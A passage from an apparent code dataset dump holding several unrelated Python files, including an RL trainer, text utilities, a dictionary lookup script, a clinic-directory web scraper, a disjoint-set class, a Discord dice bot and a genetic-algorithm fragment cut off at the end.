run_training_loop(self, n_iter, collect_policy, eval_policy):\n \n \"\"\"\n :param n_iter: number of (dagger) iterations\n :param collect_policy:\n :param eval_policy:\n \"\"\"\n\n # init vars at beginning of training\n self.total_envsteps = 0\n self.start_time = time.time()\n\n print_period = self.params['scalar_log_freq']\n for itr in tqdm(range(n_iter)):\n if itr % print_period == 0:\n print(\"\\n********** Iteration %i ************\"%itr)\n\n # collect trajectories, to be used for training\n #if isinstance(self.agent, DQNAgent):\n # only perform an env step and add to replay buffer for DQN\n self.agent.step_env()\n envsteps_this_batch = 1\n \n self.total_envsteps += envsteps_this_batch\n\n # train agent (using sampled data from replay buffer)\n if itr % print_period == 0:\n print(\"\\nTraining agent...\")\n all_logs = self.train_agent()\n\n if itr % print_period == 0:\n self.dump_density_graphs(itr)\n\n\n # log/save\n if itr % self.params['scalar_log_freq'] == 0:\n # perform logging\n print('\\nBeginning logging procedure...')\n self.perform_dqn_logging(all_logs)\n\n \n print(\"\\n\\n********** Training finished ************\")\n all_logs = self.train_agent()\n self.perform_dqn_logging(all_logs)\n\n def train_agent(self):\n all_logs = []\n for train_step in range(self.params['num_agent_train_steps_per_iter']):\n ob_batch, ac_batch, re_batch, next_ob_batch, terminal_batch = self.agent.sample(\n self.params['train_batch_size'])\n train_log = self.agent.train(ob_batch, ac_batch, re_batch, next_ob_batch, terminal_batch)\n all_logs.append(train_log)\n return all_logs\n\n\n def perform_dqn_logging(self, all_logs):\n last_log = all_logs[-1]\n\n episode_rewards = get_wrapper_by_name(self.env, \"Monitor\").get_episode_rewards()\n if len(episode_rewards) > 0:\n self.mean_episode_reward = np.mean(episode_rewards[-100:])\n if len(episode_rewards) > 100:\n self.best_mean_episode_reward = max(self.best_mean_episode_reward, self.mean_episode_reward)\n\n logs = OrderedDict()\n\n logs[\"Train_EnvstepsSoFar\"] = self.agent.t\n logs[\"Train_EpisodeSoFar\"] = self.agent.num_episodes\n print(\"Timestep %d\" % (self.agent.t,))\n print(\"Num Episodes %d\" % (self.agent.num_episodes,))\n if self.agent.num_episodes > 0:\n print(\"Success rate(%) = {0:.2f}\".format(self.agent.num_at_site * 100 /self.agent.num_episodes))\n\n logs[\"Num_Episode_reach_the_goal\"] = self.agent.num_at_site\n\n if self.mean_episode_reward > -5000:\n logs[\"Train_AverageReturn\"] = np.mean(self.mean_episode_reward)\n print(\"mean reward (100 episodes) %f\" % self.mean_episode_reward)\n if self.best_mean_episode_reward > -5000:\n logs[\"Train_BestReturn\"] = np.mean(self.best_mean_episode_reward)\n print(\"best mean reward %f\" % self.best_mean_episode_reward)\n\n if self.start_time is not None:\n time_since_start = (time.time() - self.start_time)\n print(\"running time %f\" % time_since_start)\n logs[\"TimeSinceStart\"] = time_since_start\n\n logs.update(last_log)\n\n sys.stdout.flush()\n\n for key, value in logs.items():\n print('\\t{} : {}'.format(key, value))\n print('Done logging...\\n\\n')\n\n\n def dump_density_graphs(self, itr):\n import matplotlib.pyplot as plt\n self.fig = plt.figure()\n filepath = lambda name: self.params['logdir']+'/curr_{}.png'.format(name)\n\n num_states = self.agent.replay_buffer.num_in_buffer - 2\n states = self.agent.replay_buffer.obs[:num_states]\n if num_states <= 0: return\n \n H, xedges, yedges = np.histogram2d(states[:,0], states[:,1], range=[[0., 1.], [0., 1.]], density=True)\n plt.imshow(np.rot90(H), interpolation='bicubic')\n plt.colorbar()\n plt.title('State Density')\n self.fig.savefig(filepath('state_density'), bbox_inches='tight')\n \n plt.clf()\n ii, jj = np.meshgrid(np.linspace(0, 1), np.linspace(0, 1))\n obs = np.stack([ii.flatten(), jj.flatten()], axis=1)\n density = self.agent.exploration_model.forward_np(obs)\n density = density.reshape(ii.shape)\n plt.imshow(density[::-1])\n plt.colorbar()\n plt.title('RND Value')\n self.fig.savefig(filepath('rnd_value'))#, bbox_inches='tight')\n \n plt.clf()\n exploration_values = self.agent.dqn.qa_values(obs).mean(-1)\n exploration_values = exploration_values.reshape(ii.shape)\n plt.imshow(exploration_values[::-1])\n plt.colorbar()\n plt.title('predicted Q value')\n self.fig.savefig(filepath('predicted_q_value')) #, bbox_inches='tight')\n","sub_path":"expl_rnd/rl_trainer.py","file_name":"rl_trainer.py","file_ext":"py","file_size_in_byte":7310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"445858886","text":"# -*- coding: utf-8 -*-\nimport os\nimport string\nimport re\n\n\ndef read_file(path, skip_lines_num):\n with open(path, 'r', encoding='utf-8') as f:\n lines = [line.strip() for line in f.readlines()]\n lines = lines[skip_lines_num:]\n return lines\n\n\ndef write_file(path, write_data):\n with open(path, 'w', encoding='utf-8') as writer:\n writer.writelines(write_data)\n\n\ndef mkdir(path):\n if not os.path.isdir(path):\n os.mkdir(path)\n\n\ndef replace_punctuation(str):\n punctuation_string = string.punctuation\n for i in punctuation_string:\n str = str.replace(i, \"$\" + i + \"$\")\n return str\n\n\ndef remove_chinese_punctuation(line, strip_all=True):\n # 漢字的範圍為”\\u4e00-\\u9fa5“,這個是用Unicode表示的,所以前面必須要加”u“\n # 字元”r“的意思是表示忽略後面的轉義字元,這樣簡化了後面正則表示式裡每遇到一個轉義字元還得挨個轉義的麻煩\n if strip_all:\n rule = re.compile(r\"[^a-zA-Z0-9\\u4e00-\\u9fa5]\", re.U)\n line = rule.sub('', line)\n else:\n punctuation = \"\"\"!?。"#$%&'()*+-/:;<=>@[\]^_`{|}~⦅⦆「」、、〃》「」『』【】〔〕〖〗〘〙〚〛〜〝〞〟〰〾〿–—‘'‛“”„‟…‧﹏\"\"\"\n re_punctuation = \"[{}]+\".format(punctuation)\n line = re.sub(re_punctuation, \"\", line)\n return line.strip()\n\n\ndef remove_unknown_word(sentence):\n unknow_list = \"、◦™‑•\"\n sentence = sentence.replace(\",\", \",\")\n sentence = sentence.translate(str.maketrans('', '', unknow_list))\n return sentence\n\n\ndef remove_items_in_list(test_list, item):\n # remove the item for all its occurrences\n test_list = list(filter(lambda x: x != item, test_list))\n # print(test_list)\n return test_list\n\n\ndef check_item_in_list(str, list):\n result = \"notMatch\"\n for target in list:\n if target in str:\n result = target\n return result\n# test area\n# a=\"Type-(I) 2.48\"\n# print(replace_punctuation(a))\n\n# str=remove_unknown_word(\"、CD3、\")\n# print(str)\n","sub_path":"tool_box.py","file_name":"tool_box.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"266869434","text":"#!/usr/bin/python3\n#coding=utf-8\n\nimport urllib\nimport sys\nimport getopt\nfrom bs4 import BeautifulSoup\n\n\nclass dic():\n def __init__(self, csv_filename=\"/home/bacon/Projects/small_projects/python/NGNG.csv\"):\n self.wordlist = []\n self.file_old = []\n self.file_in = []\n self.csv_file=csv_filename\n self.csvlist = []\n with open(self.csv_file,'r') as cfile:\n self.csvlist = cfile.readlines()\n for i in range(0,len(self.csvlist)-1):\n self.csvlist[i] = self.csvlist[i][:-1]\n self.csvlist[i] = self.csvlist[i].replace(\" \",\"\").replace(\"<\",\" \").replace(\"n.\",\"<br>n.\").replace(\"v.\",\"<br>v.\").replace(\"a.\",\"<br>adj.\").replace(\"adv.\",\"<br>adv.\")\n\n def trans(self, word):\n \"\"\"输入英语单词, 返回单词的翻译.翻译来自爱词霸\"\"\"\n website = \"http://www.iciba.com/\"\n url = website+word\n html = urllib.request.urlopen(url).read().decode('utf-8')\n soup = BeautifulSoup(html,\"lxml\")\n cont = soup.find_all('ul')[1]\n stst = \"\"\n for tag in cont.find_all(class_=\"prop\"):\n tag.string = \"<br>\" + tag.string\n for string in cont.stripped_strings:\n stst = stst + string\n return stst.replace(\"\\n\",\"\").replace(\" \",\"\")\n\n def fileread(self, filename):\n \"\"\"在文件中读取全部单词, 忽略有空格的行\"\"\"\n with open(filename, 'r') as fi:\n while 1:\n word = fi.readline().replace(\"\\n\", '')\n if not word:\n return -1\n else:\n self.file_in.append(word) # 原文件, 列表\n if ' ' in word:\n self.wordlist.append(0) #行中有空格就加0\n else:\n self.wordlist.append(word)\n\n def filewrite(self, filename, number=0):\n \"\"\"输出\"\"\"\n total = len(self.wordlist) # 单词总数\n i = 0 # 目前进度\n iciba = 0 # 爱词霸查词数目\n iciba_list = []\n if number != 0:\n with open(filename, 'r') as fi:\n self.file_old = fi.readlines()\n with open(filename, \"w+\") as fi:\n while 1:\n print(\"%d/%s\" % (i+1, total))\n if self.wordlist[i] != 0 and i >= number:\n wordin = self.find_in_csv(self.wordlist[i])\n if self.wordlist[i] == wordin:\n print(\"%d!\" % (i+1))\n iciba += 1\n iciba_list.append(i+1)\n fi.write(self.wordlist[i]+' '+self.trans(self.wordlist[i])+'\\n')\n else:\n fi.write(wordin)\n elif i >= len(self.file_old):\n fi.write(self.file_in[i])\n else:\n fi.write(self.file_old[i])\n i += 1\n sys.stdout.flush()\n if i == total:\n print(iciba,iciba_list)\n break\n\n def find_in_csv(self, word):\n lili = [] \n for line in self.csvlist:\n if word == line[0:len(word)] or word in line:\n lili.append(line)\n for line in lili:\n if word == line[0:len(word)] and line[len(word)] == ' ':\n return(line+'\\n')\n for line in lili:\n if word in line:\n return(line+'\\n')\n if lili == []:\n return(word)\n\n def main(self, file_in, file_out, number):\n \"\"\"单词表文件, 输出目标文件, 断点续输出行号\"\"\"\n if file_in == '' or file_out == '':\n print(\"No file\")\n sys.exit()\n self.fileread(file_in)\n self.filewrite(file_out, number)\n\nopts, args = getopt.getopt(sys.argv[1:], \"hi:o:n:\")\ninput_file = \"\"\noutput_file = \"\"\ncontinue_number = 0\nfor op, value in opts:\n if op == \"-i\":\n input_file = value\n elif op == \"-o\":\n output_file = value\n elif op == \"-n\":\n continue_number = int(value)\n elif op == \"-h\":\n print(\"\"\"-i\\t输入文件\\n-o\\t输出文件\\n-n\\t断点续输出行号\\n-h\\t显示帮助\\n\"\"\")\n sys.exit()\na = dic()\na.main(input_file, output_file, continue_number)\n","sub_path":"python/dic.py","file_name":"dic.py","file_ext":"py","file_size_in_byte":4814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"553223594","text":"import time\nfrom numpy.random import *\nimport urllib.request\nimport urllib.parse\nimport bs4\nimport pandas as pd\nimport os\nimport sys\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as ec\nimport codecs\nimport pickle\nimport re\nimport threading\nimport mysql.connector\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.options import Options\nfrom joblib import Parallel, delayed\nfrom contextlib import closing\nfrom concurrent.futures import ThreadPoolExecutor, as_completed, wait\n\nSTART_ID = 0\nEND_ID = 150000\n\nsys.setrecursionlimit(1000000)\nPATH = os.path.dirname(os.path.abspath(__file__))\nDB = 'db'\nCLINIC_TABLE = 'clinics'\nURL_STATUS_TABLE = 'url_status'\nCLINIC_STATUS_TABLE = 'clinic_status'\nURL_TABLE = 'urls'\nCLINIC_HTML_TABLE = 'clinic_html'\nTIMEOUT = 30\n\nTRAVEL_TIME_REPATTER = re.compile(r'[0-9]+.m')\n\nAREAS = pd.read_csv('../util/Pref-JP-EN.csv')\nBASE_URL = \"https://byoinnavi.jp\" # BASE_URL/todofuken/category_id\nPROCESS_LIMIT = 5\nTHREAD_NUM = 50\nserch_url_stack = []\n\ndef extract_clinic_url(soup):\n res = []\n clinic_list = soup.findAll('tr', {'class': 'clinic corp_opened'})\n\n for clinic in clinic_list:\n clinic_url = BASE_URL + clinic.findAll('div', {'class': 'clinic_title'})[0].findAll('a')[0].get('href')\n res.append(clinic_url)\n \n return res\n\n\ndef extract_data(clinic):\n name = clinic.findAll('span', {'itemprop': 'name'})[0].getText(strip=True)\n\n disease_area = ''\n if len(clinic.findAll('dd', {'class': 'corp-info-ext__curable-diseases'}))> 0:\n disease_area = clinic.findAll('dd', {'class': 'corp-info-ext__curable-diseases'})[0].getText(strip=True)\n \n departments = clinic.findAll('td', {'class': 'clinic_info_cate'})[0].a\n department = ''\n for d in departments:\n department += d.string + ','\n\n nearest_station = ''\n travel_time = ''\n if len(clinic.findAll('div',{'class': 'clinic_map_memo word_break'}))> 0 and len(clinic.findAll('div',{'class': 'clinic_map_memo word_break'})[0].findAll('a')) > 0:\n nearest_station = clinic.findAll('div',{'class': 'clinic_map_memo word_break'})[0].findAll('a')[0].getText(strip=True)\n travel_time = TRAVEL_TIME_REPATTER.findall(clinic.findAll('div',{'class': 'clinic_map_memo word_break'})[0].getText(strip=True))[0]\n\n area = clinic.findAll('div', {'class': ['clinic_addr1', 'corp__address']})[0].findAll('span', {'itemprop': 'addressRegion'})[0].getText(strip = True)\n locality = clinic.findAll('div', {'class': ['clinic_addr1', 'corp__address']})[0].findAll('span', {'itemprop': 'addressLocality'})[0].getText(strip = True)\n streetAddress = clinic.findAll('div', {'class': ['clinic_addr1', 'corp__address']})[0].findAll('span', {'itemprop': 'streetAddress'})[0].getText(strip = True)\n addr = area + locality + streetAddress\n\n tel = clinic.findAll('td', {'class': 'clinic_info_tel'})[0].getText(strip=True)\n url = ''\n if len(clinic.findAll('td', {'class': 'clinic_info_url'})) > 0:\n url = clinic.findAll('td', {'class': 'clinic_info_url'})[0].findAll('a')[0].get('href')\n\n #print('name: ' + name)\n #print('addr: ' + addr)\n #print('tel: ' + tel)\n #print('url: ' + url)\n #print('department: ' + department)\n #print('disease_area: ' + disease_area)\n #print('nearest_station: ' + nearest_station)\n #print('travel_time: ' + travel_time)\n #print('----------------------')\n res = [name, area, addr, disease_area, department, nearest_station, travel_time, url]\n\n return res\n\ndef get_browser():\n # return webdriver.PhantomJS(service_args=None, service_log_path=os.path.devnull )\n options = Options()\n options.add_argument('--headless')\n return webdriver.Chrome(chrome_options=options)\n\ndef download_html(browser, url):\n print(\"downloading...\" + url)\n\n browser.get(url)\n html = browser.page_source.encode(\"utf-8\")\n\n return html\n\ndef download(browser, url):\n print(\"downloading...\" + url)\n\n browser.get(url)\n html = browser.page_source.encode(\"utf-8\")\n soup = bs4.BeautifulSoup(html, \"lxml\")\n\n next_page_url = get_next_page_url(soup)\n\n return [soup, next_page_url]\n\ndef get_next_page_url(soup):\n last_element = ''\n if len(soup.findAll(\"div\", {\"class\": \"page_next\"})) > 0:\n last_element = soup.findAll(\"div\", {\"class\": \"page_next\"})[0].findAll('a')[-1]\n else:\n return None\n\n if last_element.getText(strip=True) == '>次へ':\n return BASE_URL + last_element.get('href')\n else:\n return None\n\ndef print_date(date):\n for key, val in date.items():\n print(key + ': ' + val)\n\ndef insert_clinic_db(conn, data):\n print(data)\n c = conn.cursor()\n sql = 'insert into ' + CLINIC_TABLE + ' (id, name, area, addr, disease_area, department, nearest_station, travel_time, url) values (%s,%s,%s,%s,%s,%s,%s,%s,%s)'\n c.execute(sql, tuple(data))\n conn.commit()\n\ndef insert_clinic_html_db(conn, id, html):\n ##print(type(id))\n #print(type(html))\n c = conn.cursor()\n sql = 'insert into ' + CLINIC_HTML_TABLE + ' (id, html, is_finished) values (%s,%s, 0) '\n c.execute(sql, (id, html))\n conn.commit()\n\ndef insert_url_list(conn, url_list):\n c = conn.cursor()\n for url in url_list:\n sql = 'insert into urls(url, is_finished) values (%s, %s)'\n c.execute(sql, [url, 0])\n #print(url)\n conn.commit()\n\ndef update_status_db(conn, area, page, is_finished):\n data = [page, is_finished, area]\n c = conn.cursor()\n sql = 'update ' + URL_STATUS_TABLE + ' SET page = %s, is_finished = %s where id = %s'\n c.execute(sql, data)\n conn.commit()\n\ndef update_clinic_status_db(conn, id):\n c = conn.cursor()\n sql = 'update ' + CLINIC_STATUS_TABLE + ' SET progress = %s where id = %s'\n c.execute(sql, [id, 1])\n conn.commit()\n\ndef get_page(conn, area):\n c = conn.cursor()\n sql = 'select is_finished, page from ' + URL_STATUS_TABLE + ' where id = \\'' + area + '\\''\n c.execute(sql)\n data = c.fetchall()[0]\n return data\n\ndef get_id(conn):\n c = conn.cursor()\n sql = 'select id from ' + CLINIC_STATUS_TABLE\n c.execute(sql)\n data = c.fetchall()[0][0]\n #print(data)\n return data\n\ndef get_url(conn, id):\n c = conn.cursor()\n sql = 'select url from ' + URL_TABLE + ' where id = %s'\n c.execute(sql, [id])\n data = c.fetchall()[0][0]\n return data\n\ndef init_url_status_db(conn):\n c = conn.cursor()\n for i in range(0,47):\n area = AREAS.iloc[i, 1].lower()\n sql = 'insert into ' + URL_STATUS_TABLE + ' (id, page, is_finished) values (%s,%s,%s)'\n c.execute(sql, (area, 1, 0))\n conn.commit()\n\ndef init_url_status(conn, area):\n c = conn.cursor(buffered=True)\n sql = 'select * from ' + URL_STATUS_TABLE + ' where id = \\'' + area + '\\''\n # sql = \"select * from url_status where id = 'ehime'\"\n c.execute(sql)\n if len(c.fetchall()) is 0:\n sql = 'insert into ' + URL_STATUS_TABLE + ' (id, page, is_finished) values (%s,%s, %s)'\n c.execute(sql, (area, 1, 0))\n conn.commit()\n\ndef get_clinic_html(conn, id):\n c = conn.cursor()\n sql = 'select html from ' + CLINIC_HTML_TABLE + ' where id = %s'\n c.execute(sql, [id])\n data = c.fetchall()[0][0]\n return data\n\ndef update_clinic_html_status(conn, id):\n c = conn.cursor()\n sql = 'update ' + CLINIC_HTML_TABLE + 'set is_finished = 1 where id = %s'\n c.execute(sql, [id])\n return\n\ndef get_clinic_url_list():\n with closing(mysql.connector.connect(user='root', host='127.0.0.1', database=DB)) as conn:\n c = conn.cursor(buffered=True)\n sql = 'select id, url from ' + URL_TABLE + ' where is_finished = 0 and id >= %s and id < %s ;'\n c.execute(sql, (START_ID, END_ID))\n res = c.fetchall()\n return res\n\ndef update_url_status_done(conn, id):\n c = conn.cursor()\n sql = 'update ' + URL_TABLE + ' SET is_finished = %s where id = %s'\n c.execute(sql, [1, id])\n conn.commit()\n \n\n\ndef crawl_clinic_page(urls):\n with closing(mysql.connector.connect(user='root', host='127.0.0.1', database=DB)) as conn:\n #print(\"=== start sub thread ===\")\n browser = get_browser()\n for url_data in urls:\n id = url_data[0]\n url = url_data[1]\n #print(\"id, url: \" + str(id) + ', ' + url)\n # time.sleep(0.001 * rand())\n # soup,_ = download(browser, url)\n # try:\n # data = extract_data(soup)\n # data.insert(0, id)\n # print(data)\n # insert_clinic_db(conn, data)\n # except mysql.connector.errors.IntegrityError:\n # print(\"duplicarte key\")\n data = download_html(browser, url)\n insert_clinic_html_db(conn, id, data)\n\n update_url_status_done(conn, id)\n\n browser.quit()\n\ndef scrape_clinic_pages(ids):\n with closing(mysql.connector.connect(user='root', host='127.0.0.1', database=DB)) as conn:\n for id in ids:\n html = get_clinic_html(conn, id)\n soup = bs4.BeautifulSoup(html, \"lxml\")\n data = extract_data(soup)\n data.insert(0,id)\n insert_clinic_db(conn, data)\n update_clinic_html_status(conn, id)\n\ndef run(area):\n with closing(mysql.connector.connect(user='root', host='127.0.0.1', database=DB)) as conn:\n print(\"=== start sub thread for '\" + area + \"' ===\")\n init_url_status(conn, area)\n url = BASE_URL + '/' + area\n\n is_finished, page = get_page(conn, area)\n browser = get_browser()\n # is_finished = 1 # for skip get URL LIST\n\n # URL LIST \n if is_finished is 0:\n while True:\n soup, next_page_url = download(browser, url + '?p=' + str(page))\n insert_url_list(conn, extract_clinic_url(soup))\n\n print(str(next_page_url))\n\n if next_page_url is None:\n update_status_db(conn, area, page, 1)\n break\n else:\n page += 1\n update_status_db(conn, area, page, 0)\n \n browser.quit()\n \n # # CLINIC DATA\n # id = get_id(conn)\n # while True:\n # url = get_url(conn, id)\n # if url is not None:\n # soup, _ = download(url)\n # insert_clinic_db(conn, extract_data(soup))\n\n # id += 1\n # print(id)\n # update_clinic_status_db(conn, id)\n # else:\n # break\n\ndef chunked(iterable, n):\n return [iterable[x:x + n] for x in range(0, len(iterable), n)]\n\ndef clinic_crawl_process(url_list):\n with ThreadPoolExecutor(max_workers=THREAD_NUM) as pool:\n pool = ThreadPoolExecutor(max_workers=THREAD_NUM)\n chunked_url_list = chunked(url_list, len(url_list)//THREAD_NUM)\n print(len(chunked_url_list))\n\n # for arr in chunked(url_list, THREAD_NUM):\n res = pool.map(crawl_clinic_page, chunked_url_list)\n wait(res)\n\n print(\"submit end\")\n\n\nif __name__=='__main__':\n print(\"=== main thread start ===\")\n url_list = get_clinic_url_list()\n chunked_url_list = chunked(url_list, len(url_list)//PROCESS_LIMIT)\n\n # result = Parallel(n_jobs=-1)([delayed(run)(AREAS.iloc[i,1].lower())for i in range(0, 47)])\n # result = Parallel(n_jobs=-1)([delayed(clinic_crawl_process)(chunked_url_list[i])for i in range(0, PROCESS_LIMIT)])\n # result = Parallel(n_jobs=-1)([delayed(crawl_clinic_page)(chunked_url_list[i])for i in range(0, PROCESS_LIMIT)])\n crawl_clinic_page(chunked_url_list[0])\n # scrape_clinic_pages([1])\n\n\n \n print(\"=== main thread ended ===\")\n","sub_path":"20180228_byoinnavi/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"479346770","text":"# <<BEGIN-copyright>>\n# Copyright 2022, Lawrence Livermore National Security, LLC.\n# See the top-level COPYRIGHT file for details.\n# \n# SPDX-License-Identifier: BSD-3-Clause\n# <<END-copyright>>\n\"\"\"\nDefines the NuclearPlusCoulombInterference class which is used to store the elastic scattering reaction for a protare\nwith a charged particle as the projectile where only the 'nuclear + interference' data are included. Ergo, the \nRutherford scattering term is ignored. This reaction is equivalent to the ENDL C=9 reaction.\n\"\"\"\n\nfrom LUPY import ancestry as ancestryModule\n\nfrom .. import enums as enumsModule\nfrom .. import outputChannel as outputChannelModule\nfrom ..reactions import reaction as reactionModule\n\n\nclass NuclearPlusCoulombInterference( ancestryModule.AncestryIO ) :\n \"\"\"\n This class has only one member which is the 'nuclear + interference' reaction.\n \"\"\"\n\n moniker = 'nuclearPlusCoulombInterference'\n ancestryMembers = ( 'reaction', )\n\n def __init__(self, label):\n\n ancestryModule.AncestryIO.__init__(self)\n\n self.__reaction = reactionModule.Reaction(label, enumsModule.Genre.twoBody, 2)\n self.__reaction.setAncestor( self )\n\n @property\n def reaction( self ) :\n\n return( self.__reaction )\n\n def toXML_strList( self, indent = '', **kwargs ) :\n\n indent2 = indent + kwargs.get( 'incrementalIndent', ' ' )\n\n XMLList = [ '%s<%s>' % ( indent, self.moniker ) ]\n XMLList += self.__reaction.toXML_strList( indent2, **kwargs )\n XMLList[-1] += '</%s>' % self.moniker\n\n return( XMLList )\n\n @classmethod\n def parseNodeUsingClass(cls, node, xPath, linkData, **kwargs):\n\n instance = cls(node[0].get('label'))\n instance.reaction.parseNode(node[0], xPath, linkData, **kwargs)\n\n return instance\n","sub_path":"fudge/processing/nuclearPlusCoulombInterference.py","file_name":"nuclearPlusCoulombInterference.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"9062091","text":"\n\nclass DisJointSet(object):\n def __init__(self, n):\n self.parent = []\n self.rank = []\n self.elements = n\n self.make()\n\n # Creates n sets with single item in each\n def make(self):\n # Initially, all elements are in their own set.\n self.parent = [i for i in range(self.elements)]\n self.rank = [0] * self.elements\n\n # Returns representative of x's set\n def find(self, x):\n # Finds the representative of the set that x is an element of\n if self.parent[x] != x:\n # if x is not the parent of itself Then x is not the representative of his set,\n # so we recursively call Find on its parent and move i's node directly under the\n # representative of this set\n self.parent[x] = self.find(self.parent[x])\n\n return self.parent[x]\n\n def union(self, x, y):\n # Find representatives of two sets\n x_root = self.find(x)\n y_root = self.find(y)\n\n # Elements are in the same set, no need to unite anything.\n if x_root == y_root:\n return\n\n # If x's rank is less than y's rank\n if self.rank[x_root] < self.rank[y_root]:\n # Then move x under y so that depth of tree remains less\n self.parent[x_root] = self.parent[y_root]\n # Else if y's rank is less than x's rank\n elif self.rank[y_root] < self.rank[x_root]:\n # Then move y under x so that depth of tree remains less\n self.parent[y_root] = self.parent[x_root]\n else: # if ranks are the same\n # Then move y under x (doesn't matter which one goes where)\n self.parent[y_root] = self.parent[x_root]\n # And increment the the result tree's rank by 1\n self.rank[x_root] += self.rank[y_root] + 1\n\n\ndus = DisJointSet(5)\n\n# 0 is a friend of 2\n# dus.union(0, 2)\n# 4 is a friend of 2\n# dus.union(4, 2)\n# 3 is a friend of 1\n# dus.union(3, 1)\n\n# Check if 4 is a friend of 0\n# is_friend = dus.find(4) == dus.find(0)\n\n# print(\"0 is friend of 4 {0}\".format(is_friend))\n\n# Check if 1 is a friend of 0\n\n# print(\"1 is friend of 0 {0}\".format(dus.find(1) == dus.find(0)))\n\n\n","sub_path":"python/disjoint_set/disjoint_set.py","file_name":"disjoint_set.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"185462647","text":"import random\nimport re\n\nfrom discord.ext import commands\n\n\nclass Dice(commands.Cog, name=\"骰子功能\"):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command()\n async def roll(self, ctx, *args):\n \"\"\"擲骰子\n\n 範例:\n roll 3d6\n roll 3d6+10 測試骰\"\"\"\n try:\n dice_string = args[0]\n dice_comment = \" \".join(args[1:])\n (total, rolls, modifier) = self._roll(dice_string)\n response = \"{}\\nroll {}\".format(ctx.author.mention, dice_string)\n if dice_comment:\n response += \"\\n{}\".format(dice_comment)\n response += \"\\n{} + ({}) = {}\".format(rolls, int(modifier), total)\n except:\n response = \"指令錯誤:\\n使用範例:roll 3d6+10 測試骰\"\n await ctx.send(response)\n\n @commands.command()\n async def coc(self, ctx, *args):\n \"\"\"coc 技能判定\n\n 範例:\n coc 50\n coc 50 聆聽\"\"\"\n try:\n dc = int(args[0])\n comment = \" \".join(args[1:])\n (total, rolls, modifier) = self._roll(\"1d100\")\n if total <= 2:\n result = \"大成功\"\n elif total >= 99:\n result = \"大失敗\"\n elif total <= dc:\n result = \"成功\"\n else:\n result = \"失敗\"\n response = \"{}\\n{} (目標值:{},擲骰結果:{})\".format(ctx.author.mention, result, dc, total)\n if comment:\n response += \"\\n{}\".format(comment)\n except:\n response = \"{}\\n指令錯誤:\\n使用範例:coc 50\"\n await ctx.send(response)\n\n def _roll(self, roll_string):\n \"\"\"roll dice\n Args:\n (str) dice_string (example: \"1d20+4\")\n Return:\n (tuple)\n - (int) sum - final result of rolls and modifier\n - (list of int) rolls - dice roll results\n - (str) modifier - parsed modifier\n \"\"\"\n matched_groups = re.match(\"(\\d+)d(\\d+)([\\+|\\-]\\d+)?\", roll_string)\n dice_count = matched_groups.groups()[0]\n dice_type = matched_groups.groups()[1]\n dice_modifier = matched_groups.groups('+0')[2] # use \"+0\" in default if not matched\n dice_results = []\n for _ in range(int(dice_count)):\n dice_results.append(random.randint(1, int(dice_type)))\n dice_sum = sum(dice_results) + int(dice_modifier)\n return (dice_sum, dice_results, dice_modifier)\n","sub_path":"src/dice.py","file_name":"dice.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"617700506","text":"\r\nimport unittest\r\n\r\nfrom Button import Button\r\n\r\nclass ButtonTest(unittest.TestCase):\r\n\r\n def test_lamp_turn_on(self):\r\n b = Button()\r\n b.set_condition(True)\r\n self.assertEqual(\"on\", b.lamp.state())\r\n\r\n def test_poll(self):\r\n self.fail(\"This test check Switch interface!\")\r\n\r\nif __name__ == \"__main__\": unittest.main()","sub_path":"dip/py/buttons/step_0/ButtonTest.py","file_name":"ButtonTest.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"433528836","text":"\ndef solution(arr):\n answer = 1\n tmp = dict()\n arr.sort()\n for i in arr:\n cnt = 1\n while 1:\n if i in tmp:\n cnt += tmp[i].pop()\n if tmp[i] == []:\n tmp.pop(i)\n i *= 2\n else:\n tmp[i] = [cnt]\n break\n answer = sorted(tmp.items(), key=lambda x: x[1])[-1][1]\n return answer\n\n\nweights = [2,2,2,2,3,3,5,6]\nprint(solution(weights))\n","sub_path":"algo_py/kakao/tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"} +{"seq_id":"33782306","text":"from random import *\r\n\r\ndef product(_list):\r\n result = 1\r\n for number in _list:\r\n result *= number\r\n return result\r\n\r\ndef summ(_list):\r\n result = 0\r\n for number in _list:\r\n result += number\r\n return result\r\n\r\nclass Organism:\r\n def __init__(self, chromosome=\"random\"):\r\n if chromosome == \"random\":\r\n self.chromosome = self.randomChromosome()\r\n else:\r\n self.chromosome = chromosome\r\n \r\n self.fitness = self.fitnessFunction()\r\n\r\n def __str__(self):\r\n return str(self.chromosome) + \" \" + str(self.fitness)\r\n\r\n def cardNotation(self):\r\n sumPile = \"\"\r\n mulPile = \"\"\r\n\r\n for gene in range(len(self.chromosome)):\r\n if self.chromosome[gene] == 0:\r\n sumPile += str(gene + 1) + \"+\"\r\n else:\r\n mulPile += str(gene + 1) + \"*\"\r\n\r\n return sumPile[:-1] + \" = 36 \" + mulPile[:-1] + \" = 360\"\r\n\r\n def fitnessFunction(self):\r\n addGenes = []\r\n mulGenes = []\r\n \r\n for gene in range(len(self.chromosome)):\r\n if self.chromosome[gene] == 0:\r\n addGenes.append(gene + 1)\r\n else:\r\n mulGenes.append(gene + 1)\r\n\r\n addValue = summ(addGenes)\r\n mulValue = product(mulGenes)\r\n\r\n return (abs(36 - addValue) + abs(360 - mulValue))\r\n\r\n def mutate(self):\r\n mutatedGene = 